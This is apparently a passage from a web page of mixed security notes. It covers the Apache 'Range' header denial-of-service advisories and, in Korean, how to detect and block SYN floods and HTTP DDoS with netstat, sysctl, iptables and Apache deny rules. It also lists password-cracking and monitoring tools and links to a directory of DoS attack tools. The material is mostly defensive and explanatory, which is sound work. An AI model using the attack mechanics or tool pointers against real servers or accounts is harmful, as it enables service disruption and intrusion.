Offline NT Password and Registry Editor pogostick.net/~pnh/ntpasswd/

SpectorSoft eBlaster www.spectorsoft.com/

Sysinternals Suite technet.microsoft.com/en-us/sysinternals/bb842062.aspx

L0phtCrack www.l0phtcrack.com

"Apache Killer" a DDoS using the Range HTTP Header

In 2007, a Google engineer, Michal Zalewski, published a memo detailing a potential vulnerability of both Apache and IIS Web Servers after investigating the HTTP/1.1 "Range" header implementation. He reported then:

it is my impression that a lone, short request can be used to trick the server into firing gigabytes of bogus data into the void, regardless of the server file size, connection count, or keep-alive request number limits implemented by the administrator. Whoops?

A proof of concept for the Apache DDoS tool was published as a Perl script on the August 19 ”Full Disclosure” security mailing list. On August 24, the Apache Security Team published a memo explaining:

It most commonly manifests itself when static content is made available with compression on the fly through mod_deflate - but other modules which buffer and/or generate content in-memory are likely to be affected as well. This is a very common (the default right!?) configuration.

The attack can be done remotely and with a modest number of requests leads to very significant memory and CPU usage.

Active use of this tools has been observed in the wild.

There is currently no patch/new version of apache which fixes this vulnerability. This advisory will be updated when a long term fix is available. A fix is expected in the next 96 hours.

On Friday, Apache published a second advisory in which they explain how Apache httpd and its so called internal 'bucket brigades' deal when a server processes a request to return multiple (overlapping) ranges; in the order requested. A single request can request a very large range (e.g. from byte 0- to the end) 100's of times in a single request. Currently this kind of requests internally explode into 100's of large fetches, all of which are kept in memory in an inefficient way.

This is being addressed in two ways. By making things more efficient. And by weeding out or simplifying requests deemed too unwieldy. There are several immediate options to mitigate this issue until a full fix is available.

Apache's mitigation strategies ranged from completely disallowing the Range header, to limiting the size of requests, to deploying a custom Range counting module. Lori MacVittie detailed how the mitigation strategies could be implemeted with Big-IP.

SYN Flooding 공격이란?

신플루딩공격이란 TCP세션이 연결될 때의 취약성을 이용한 서버공격이다.

먼저 TCP의 기본적인 연결단계는 아래와 같습니다.

1. A(소스서버)가 B(목적지서버)에게 접속을 요청하는 SYN패킷을 보낸다.
2. B는 요청을 수락한다는 SYN과 ACK패킷을 A에게 보낸다.
3. A가 B에게 ACK를 보내면 연결이 이루어지고 본격적이 데이터교환이 이루어진다.

위의 2번단계에서 목적지서버(B)는 소스서버(A)가 ACK패킷을 보내주기를 계속적으로 기다리는 것이 아니라
일정시간 후 요청이 오지 않으면 백로그큐(Backlog Queue)가 허용하는 공간에 연결정보(로그)를 보관하게 됩니다.
이러한 상태가 지속적으로 요청되어 연결정보(로그)가 쌓이게 되면 목적지서버(B)의 특정서비스가 마비될 수 있습니다. 이러한 공격을 DOS공격의 일종인 SYN Flooding 공격이라고 합니다.
Syn 로그 기록후 Timeout 까지의 대기시키는데 그 타임아웃 시점보다 짧게 Syn 요청을 해서 스택을 채워네트웍을 마비시키기도 하고 Invalid 한 값의 Syn으로 무차별적으로 이루어 지기도 한다.

SYN Flooding 공격탐지

1. SYN_RECV 가 있으면 공격에 노출되었다고 보면 된다.

   ~$ netstat -na | grep SYN
   tcp 0 0 61.250.171.252:28004 94.9.83.63:3072 SYN_RECV
   tcp 0 0 61.250.171.252:28004 3.7.244.2:3072 SYN_RECV
   tcp 0 0 61.250.171.252:28004 48.32.206.32:3072 SYN_RECV
   
   ~$ netstat -na |grep SYN | wc -l
   146
   
   정상적인 경우라면 거의 0이어야 함

2. SYN Cookies가 작동할 때 SYN Flooding공격이 있으면 messages 파일에 아래와 같은 내용이 출력된다.
   #Possible SYN flooding on port 80. Sending cookies.

SYN Flooding 공격막기

이러한 신플루딩 공격을 차단하기 위해서는 백로그큐의 사이즈를 늘려주는 방법과 tcp_syncookies값을 1로 설정하는 방법이 있습니다.

1. SYN backlog사이즈 증가
   cat /proc/sys/net/ipv4/tcp_max_syn_backlog 로 현재 서버의 백로그큐 값을 확인

   ~$ cat /proc/sys/net/ipv4/tcp_max_syn_backlog
   1024
   
   1024 보다 작으면 1024 이상으로 설정해줍니다.
   
   sysctl \-w net.ipv4.tcp_max_syn_backlog=1024

2. SYN Cookie설정
   위와 같이 백로그큐의 값을 늘려주더라도 이 방법은 임시적인 방법일 뿐, 지속적인 공격을 당하게 된다면 결국 로그값이 가득차게 된다. 그렇기 때문에 백로그큐의 값을 늘려주는 것과 함께 신쿠기 기능도 설정해줘야 합니다.
   cat /proc/sys/net/ipv4/tcp_syncookies 로 현재 서버의 신쿠키 값을 확인해서 0으로 되어 있다면
   sysctl -w net.ipv4.tcp_syncookies=1 ← 요렇게 값을 1로 바꿔줍니다.

   ~$ cat /proc/sys/net/ipv4/tcp_syncookies
   1
   ~$ sysctl \-w net.ipv4.tcp_syncookies=1
   error: permission denied on key 'net.ipv4.tcp_syncookies'
   ~$ sudo sysctl \-w net.ipv4.tcp_syncookies=1
   net.ipv4.tcp_syncookies = 1

   신쿠키는 백로그큐가 가득 찼을 경우에도 정상적인 접속요구를 계속 받아들일수 있도록 해주므로 신플루딩 공격에 대비한 가장 효과적인 방법중 하나입니다.

3. IP TABLES
   • IP직접막기

     ~$ iptables -A INPUT -s <Source IP> -j DROP

   • Rule추가

     ~$ iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
     ~$ iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
     ~$ iptables -A INPUT -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
     ~$ iptables -A INPUT -p tcp --tcp-flags ACK,FIN FIN -j DROP
     ~$ service iptables save
     ~$ service iptables restart

4. sysctl.conf에 rule추가

   ~$ vi /etc/sysctl.conf
   
   # Enable TCP SYN cookie protection
   net.ipv4.tcp_syncookies = 1
   
   # Decrease the time default value for tcp_fin_timeout connection
   net.ipv4.tcp_fin_timeout = 30
   
   # Turn off the tcp_window_scaling
   net.ipv4.tcp_window_scaling = 0
   
   # Turn off the tcp_sack
   net.ipv4.tcp_sack = 0
   
   Then execute the command :-
   # /sbin/sysctl -p

5. iptables 조회 (block추가나 해재후에 확인 절차. 아래는 default iptables 조회시의 output)

 ~$ iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
 

공격툴

http://packetstormsecurity.nl/DoS/

0 comments | Add Comment

DDOS 대응방법

DDOS공격시 아파치웹상으로 대응하는 방법을 기술한다.

• DDOS탐지
  탐지는 보통 System팀에서 Report가 오게 되지만, 웹팀내에서도 확인이 필요합니다.
  • 아파치 로그상에서 IP별 request건수 측정

    tail -n 10000 access_log | cut -f1 -d' ' | sort | uniq -c | sort -nk 1

  • 특정 IP/Agent에 대한 request건수 측정

    grep 'A cat' access_log | cut -f1 -d' ' | sort | uniq -c

    아파치 로그파일의 위치는 /usr/local/apache/log/access

• IP Block
  해당 호스트의 아파치 VirtualHost셋팅내의 Directory 부분에 Deny From 추가

  <Directory "/usr/local/tomcat/webapps/ROOT">
      Options -Indexes FollowSymLinks MultiViews
      AllowOverride None
      Order allow,deny
      Allow from all
      Deny from xxx.xxx.xxx.xxx
      FileETag None
    </Directory>

• Agent Block
  해당 호스트의 아파치 VirtualHost셋팅내에 아래와 같이 Agent pattern을 deny from에 추가

  <Location ~ "/*">
      Order allow,deny
      Allow from all
      Deny from env=bad_req
    </Location>
  SetEnvIfNoCase User-Agent "^Mozilla/4.0.*MyIE 3.01" bad_req

• Syn Flooding